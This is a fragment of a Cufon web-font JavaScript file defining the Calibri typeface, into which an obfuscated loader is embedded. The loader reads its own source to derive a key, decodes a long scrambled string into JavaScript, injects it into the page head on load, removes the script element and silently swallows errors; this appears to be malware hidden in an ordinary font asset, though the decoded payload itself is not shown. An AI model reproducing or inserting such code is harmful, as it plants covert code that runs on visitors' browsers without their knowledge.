:20,"Y":20}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+282-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("xvSgBV7h~A&oxt3=sVO#4v4&1e7gSV&o1e0#~A%:SqZ2Xph_1+Hiuv%YXg(gulkJXJ4e1+H#ulNi1+HiuvNg1O($sL)iXe%$sL)iSl3$sL)iSVq$sL)iXA7$sL)iXVO&1+HiuvO_1+HiuvOY1+HiuvHg1+Hiuv4asO(gulkV!LZ*bO(gulky7O(gulkySq(gulky7g(gulkV7pzCXb2z1+HiuvHh1+HiuvSY1+Hiuv4*1+Hiuv4h1+HiuvN(1+HiuvSyxO(gulk_ugi{s3(gulk_7q(gulkVuq(gulk3Xp3Hu1-$sL)#Xp3$sL)iSV0o1gSN1+HiuvXish7xqq(gulkYS3(gulkJS1z$sL)iXL7$sL)iXV%$sL)iXVu&X_SR,O(gulkJuO(gulk_u3(gulkYSq(gulkJ7O(gulkYXq(gulkV7+y$sL)iXL)pPO(gulk_uO(gulkYug(gulkY7_7$sL4#uL3$sL)iXJO)1+HiuvHa1+HiuvSV%g(gulkJ7Js$sL)iSlk31+Hiuv%J1+HiuvN#1+Hiuvup1+Hiuv03~gg$sL)iSAXo1+HiuvN*1+HiuvIg1+HiuvX*Hp-$sL)iSJ0$sL)iXeO$sL)iSL0#1+Hiuv%_%3(gulkYuq(gulkYu3(gulk_!q(gulky7:q$sL)iXeSV1+Hiuvu-1+HiuvH(1+HiuvIhL3(gulkJuYqbqg(gulkJXh3$sL)iSls$sL)iSV7$sL)iSAq-1+HiuvI*1+HiuvXeI3(gulkJ7pk7A+MB1+HiuvHe1+HiuvXp1+HiuvugA:O27q(gulk3S+(WBq(gulkyXq(gulkySJ%$sL)iXL3zIq(gulkJuq(gulk3!bH5Lts$sL)iXpyp4q(gulk_SJ2YS+k{1+Hiuvq_1+HiuvHp1+Hiuv0_1+HiuvH*1+HiuvXg4NM$sL)iSLk$sL)iSAO,1+Hiuv4eHAsSHvz$4_h_P:7iBv3hxt4_xb(z,L)2$lg_P:)2BlgiPV(3BVsh~t(:,A4oS_-:B+3i~+u&Rah=~AXWX_-{~ph{1_Cm!:sas)ktlNOv+40xPu7!,I%bLHqA1XS~B$sR8Cy_JY3V:Wz5j2Mo{i(#phgea*-U=Z&9mgioxLZW,pWoxgioBVqhBAqY~AO$PV%38v-3svg3Sv3y1t-YS1ioxgioBVqhPAg3Sv3y1t-YS1(oS1IMBAqY~AO$PV%3xbI{~b-hS17hxv({XeOh~A&oPVy{$a%oXAg3xb3VBa4W!eYZBl2jxeYzSgMJAe3s1LgiAe3s8bYWxb)C")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":199,"face":{"font-family":"Calibri","font-weight":400,"font-stretch":"normal","units-per-em":"400","panose-1":"2 15 5 2 2 2 4 3 2 4","ascent":"300","descent":"-100","x-height":"4","bbox":"-13 -339 344.601 76.75","underline-thickness":"26.1719","underline-position":"-32.2266","unicode-range":"U+0020-U+00FF"}}));
